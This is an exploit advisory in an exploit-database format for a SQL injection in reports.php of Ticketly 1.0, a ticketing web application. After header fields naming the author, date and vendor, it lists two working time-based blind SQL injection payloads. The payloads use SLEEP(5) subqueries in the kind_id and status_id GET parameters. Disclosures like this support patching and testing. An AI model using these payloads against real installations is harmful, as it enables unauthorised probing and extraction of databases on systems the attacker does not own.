# Exploit Title: Ticketly 1.0 reports.php SQL Injection
# Google Dork: n/a
# Date: 11-21-2018
# Exploit Author: sunjester
# Vendor Homepage: https://github.com/amnersaucedososa/ticketly
# Software Link: https://github.com/amnersaucedososa/ticketly
# Version: 1.0
# Tested on: Linux/Ubuntu/Apache2
# CVE: n/a
Parameter: kind_id (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: view=reports&project_id=&priority_id=&start_at=&finish_at=&status_id=2&kind_id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))fDuR)
Parameter: status_id (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: view=reports&project_id=&priority_id=&start_at=&finish_at=&status_id=2 AND (SELECT * FROM (SELECT(SLEEP(5)))BDzi)&kind_id=1